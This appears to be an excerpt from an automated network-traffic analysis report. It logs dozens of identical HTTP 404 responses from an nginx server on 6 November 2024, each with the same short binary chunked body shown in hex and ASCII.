        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:08 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:09 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:10 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:12 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:13 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:37:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
